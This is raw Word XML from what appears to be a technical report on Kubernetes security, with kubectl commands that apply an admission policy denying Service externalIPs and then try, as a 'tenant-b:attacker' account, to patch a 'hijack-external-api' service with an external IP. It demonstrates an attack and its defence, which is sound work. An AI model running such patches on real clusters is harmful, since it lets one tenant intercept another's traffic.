          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  -</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F65DFC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>p '{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F65DFC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"spec</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F65DFC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>":{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F65DFC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"externalIPs</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F65DFC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>":null</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F65DFC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}}' \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3659DC2F" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRPr="00F65DFC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65DFC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  --as=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F65DFC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>system:serviceaccount</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F65DFC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:security-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F65DFC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>admin:security</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F65DFC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3060CAD8" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRPr="00F65DFC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0C529D29" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRPr="00F65DFC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65DFC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kubectl apply -f deny-service-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F65DFC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>externalips.yaml</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F65DFC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5863D575" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRPr="00F65DFC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65DFC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  --as=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F65DFC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>system:serviceaccount</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F65DFC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:security-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F65DFC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>admin:security</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F65DFC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0900BFC0" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRPr="00F65DFC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7CC8DED8" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRPr="00F65DFC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65DFC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kubectl get validatingadmissionpolicy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411A0A37" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRPr="00F65DFC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65DFC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kubectl get validatingadmissionpolicybinding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F06C2AA" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRPr="00F65DFC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6166AFB3" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRPr="00F65DFC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65DFC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kubectl -n tenant-b patch service hijack-external-api \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6F4BDB" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRPr="00F65DFC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65DFC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  --type=merge \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BDE4A1" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRPr="00F65DFC" w:rsidRDefault="00F07C9E" w:rsidP="00F07C9E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65DFC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  -</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F65DFC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>p '{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F65DFC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"spec</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F65DFC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>":{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F65DFC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"externalIPs</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F65DFC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>":[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F65DFC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"192.0.2.123</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F65DFC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"]}}</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F65DFC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>' \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5538BB" w14:textId="0AF8C6B0" w:rsidR="00F07C9E" w:rsidRDefault="00F07C9E" w:rsidP="00F07C9E">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F65DFC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  --as=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F65DFC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>system:serviceaccount</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F65DFC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:tenant-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F65DFC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>b:attacker</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0C3DB309" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRDefault="00F07C9E" w:rsidP="00F07C9E">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BB87727" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRPr="00AA223A" w:rsidRDefault="00F07C9E" w:rsidP="00F07C9E">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00F07C9E" w:rsidRPr="00AA223A" w:rsidSect="00E66CD9">
      <w:headerReference w:type="even" r:id="rId25"/>
      <w:headerReference w:type="default" r:id="rId26"/>
      <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
      <w:pgMar w:top="1134" w:right="567" w:bottom="1134" w:left="1134" w:header="709" w:footer="68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4FFF3" w14:textId="77777777" w:rsidR="00DA0E90" w:rsidRDefault="00DA0E90" w:rsidP="00635E67">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="596BEF82" w14:textId="77777777" w:rsidR="00DA0E90" w:rsidRDefault="00DA0E90" w:rsidP="00635E67"/>
    <w:p w14:paraId="1CD02D2A" w14:textId="77777777" w:rsidR="00DA0E90" w:rsidRDefault="00DA0E90" w:rsidP="00635E67"/>
    <w:p w14:paraId="79615D0D" w14:textId="77777777" w:rsidR="00DA0E90" w:rsidRDefault="00DA0E90" w:rsidP="00635E67"/>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="37D399CC" w14:textId="77777777" w:rsidR="00DA0E90" w:rsidRDefault="00DA0E90" w:rsidP="00635E67">
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBFF08A" w14:textId="77777777" w:rsidR="00DA0E90" w:rsidRDefault="00DA0E90" w:rsidP="00635E67"/>
    <w:p w14:paraId="1D7BB846" w14:textId="77777777" w:rsidR="00DA0E90" w:rsidRDefault="00DA0E90" w:rsidP="00635E67"/>
    <w:p w14:paraId="2E591C9D" w14:textId="77777777" w:rsidR="00DA0E90" w:rsidRDefault="00DA0E90" w:rsidP="00635E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94020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12C1B4" w14:textId="77777777" w:rsidR="00CA5BBC" w:rsidRDefault="00CA5BBC" w:rsidP="00A93855">
        <w:pPr>
          <w:pStyle w:val="Footer"/>
          <w:ind w:firstLine="0"/>
          <w:jc w:val="center"/>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:pPr>
        <w:r w:rsidRPr="00A93855">
          <w:rPr>
            <w:sz w:val="20"/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="00A93855">
          <w:rPr>
            <w:sz w:val="20"/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGE   \* MERGEFORMAT </w:instrText>
        </w:r>
        <w:r w:rsidRPr="00A93855">
          <w:rPr>
            <w:sz w:val="20"/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="004C241E">
          <w:rPr>
            <w:noProof/>
            <w:sz w:val="20"/>
          </w:rPr>
          <w:t>6</w:t>
        </w:r>
        <w:r w:rsidRPr="00A93855">
          <w:rPr>
            <w:noProof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D5D1F" w14:textId="77777777" w:rsidR="00DA0E90" w:rsidRDefault="00DA0E90" w:rsidP="00635E67">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="755A56DC" w14:textId="77777777" w:rsidR="00DA0E90" w:rsidRDefault="00DA0E90" w:rsidP="00635E67"/>
    <w:p w14:paraId="25C325A4" w14:textId="77777777" w:rsidR="00DA0E90" w:rsidRDefault="00DA0E90" w:rsidP="00635E67"/>
    <w:p w14:paraId="4A87D7D3" w14:textId="77777777" w:rsidR="00DA0E90" w:rsidRDefault="00DA0E90" w:rsidP="00635E67"/>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4A57C782" w14:textId="77777777" w:rsidR="00DA0E90" w:rsidRDefault="00DA0E90" w:rsidP="00635E67">
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="248D99D9" w14:textId="77777777" w:rsidR="00DA0E90" w:rsidRDefault="00DA0E90" w:rsidP="00635E67"/>
    <w:p w14:paraId="6753E894" w14:textId="77777777" w:rsidR="00DA0E90" w:rsidRDefault="00DA0E90" w:rsidP="00635E67"/>
    <w:p w14:paraId="190E724D" w14:textId="77777777" w:rsidR="00DA0E90" w:rsidRDefault="00DA0E90" w:rsidP="00635E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43EA7" w14:textId="77777777" w:rsidR="00CA5BBC" w:rsidRDefault="00CA5BBC" w:rsidP="00635E67">
    <w:pPr>
      <w:pStyle w:val="Head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30</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="69847D48" w14:textId="77777777" w:rsidR="00CA5BBC" w:rsidRDefault="00CA5BBC" w:rsidP="00635E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A0D02" w14:textId="77777777" w:rsidR="00CA5BBC" w:rsidRDefault="00CA5BBC" w:rsidP="00E8209A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8D9E6" w14:textId="77777777" w:rsidR="00CA5BBC" w:rsidRDefault="00CA5BBC" w:rsidP="00F44EEA">
    <w:pPr>
      <w:pStyle w:val="Header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2AE98" w14:textId="77777777" w:rsidR="00CA5BBC" w:rsidRDefault="00CA5BBC" w:rsidP="00635E67">
    <w:pPr>
      <w:pStyle w:val="Head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7</w:t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14:paraId="0F00CC92" w14:textId="77777777" w:rsidR="00CA5BBC" w:rsidRDefault="00CA5BBC" w:rsidP="00635E67">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
  </w:p>
  <w:p w14:paraId="2CB4BE3A" w14:textId="77777777" w:rsidR="00CA5BBC" w:rsidRDefault="00CA5BBC" w:rsidP="00635E67"/>
  <w:p w14:paraId="2CF291F6" w14:textId="77777777" w:rsidR="00CA5BBC" w:rsidRDefault="00CA5BBC" w:rsidP="00635E67"/>
  <w:p w14:paraId="70D64A81" w14:textId="77777777" w:rsidR="00CA5BBC" w:rsidRDefault="00CA5BBC" w:rsidP="00635E6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77B11" w14:textId="77777777" w:rsidR="00CA5BBC" w:rsidRPr="00E8209A" w:rsidRDefault="00CA5BBC" w:rsidP="00E8209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0197"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EB10645C"/>
    <w:lvl w:ilvl="0" w:tplc="E97CBFAE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49F7519"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CB506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74B4F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D8840132"/>
    <w:lvl w:ilvl="0" w:tplc="371CA91E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="ListParagraph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" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0CF95831"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="66A435F4"/>
    <w:lvl w:ilvl="0" w:tplc="017C42A6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Beginingtitlelist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30841C0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6BF65D2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15783EB8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D5EA2D0E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BD32F19"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="430A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419A9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4B98715C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1671BB4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFE8276A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32F7CCC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C0609B18"/>
    <w:lvl w:ilvl="0" w:tplc="B88095D4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="-"/>
      <w:lvlText w:val="Рисунок %1 - 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D80E03"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="281E8F86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B897451"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2236DD4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31F364F3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="337C7BB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36103255"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0D20E014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37615467"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="433A8DE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3BF57415"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="41DE3C32"/>
    <w:lvl w:ilvl="0" w:tplc="13921FF4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Numeredlistparagraph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CBE06EA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EF94C328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432642D1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CF964D6A"/>
    <w:lvl w:ilvl="0" w:tplc="171CD91E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3C7C08"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8BBE7B2A"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Heading1"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1140" w:hanging="432"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="12"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Heading2"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1284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19" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4FC04CB4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0CC648D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540D3D75"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8D324CC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55556929"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="133C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24380D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="72C8C99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5D067962"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8D324CC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5FDF2CBB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="411074C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63C83F5B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B484A688"/>
    <w:lvl w:ilvl="0" w:tplc="5F18B3EA">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="-0"/>
      <w:lvlText w:val="Таблица %1 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916177"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B5A61AA2"/>
    <w:lvl w:ilvl="0" w:tplc="2EA03BD2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="-1"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="142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1B737AF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CB4243CE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75407427"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="76A61BE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76B83FF6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2414654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0" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7A903472"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D676FBFC"/>
    <w:lvl w:ilvl="0" w:tplc="91AC0EBE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7B931382"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="90FC8998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350332867">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="249629675">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1178883772">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="120196947">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="2132549115">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1907565833">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1083450351">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1820072790">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="870457253">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="457139138">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="245848710">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="2045128810">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1373268555">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1413770712">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="932324599">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1760448808">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="123934881">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1597443151">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="976646909">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1306201552">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="1257058031">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="372195541">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1748989788">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="1780373040">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="1449549874">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="402526936">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="1441687026">
    <w:abstractNumId w:val="18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13787601">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="993676681">
    <w:abstractNumId w:val="1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516841634">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="1020006397">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="598296271">
    <w:abstractNumId w:val="15"/>
  </w:num>
